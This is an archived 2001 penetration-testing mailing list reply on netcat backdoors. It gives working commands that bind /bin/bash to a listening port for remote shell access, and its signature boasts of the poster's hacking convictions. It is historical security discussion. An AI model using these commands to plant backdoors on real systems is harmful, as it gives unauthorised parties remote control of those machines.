Penetration Testing mailing list archives
Re: [PEN-TEST] nc backdooring
From: Cold Fire <coldfire () SHADY ORG>
Date: Thu, 25 Jan 2001 21:27:53 +0000
On Wed, Jan 24, 2001 at 10:52:19PM -0200, starlink wrote:
Hi, folks ! In one machine (the server - with root permission) I typed: nc -l -p 5050 | /bin/bash In another machine (the client) I typed: nc server_ip 5050 With this I could execute any program in the server. Both machines are Red Hat Linux. The question is: How can I can the output of the remote execution back? Is there nicer way of doing this with netcat?
Compile netcat with -DGAPING_SECURITY_HOLE then: nc -v -l -p 5050 -e '/bin/bash' on the server and nc -v <ip> 5050 on your box. Steve -- 'Cold Fire, Britains most notorious hacker' Observer, July 1997 'The most recent conviction was that of [Cold Fire] whose On-line escapades spanned from hacking into educational sites to more sinister activities such as tapping into industrial and United States military sites.' DC Paul Cox, SO6 Scotland Yard CCU
Current thread:
- [PEN-TEST] nc backdooring starlink (Jan 25)
- Re: [PEN-TEST] nc backdooring Fyodor (Jan 25)
- Re: [PEN-TEST] nc backdooring Robert van der Meulen (Jan 25)
- Re: [PEN-TEST] nc backdooring Cold Fire (Jan 25)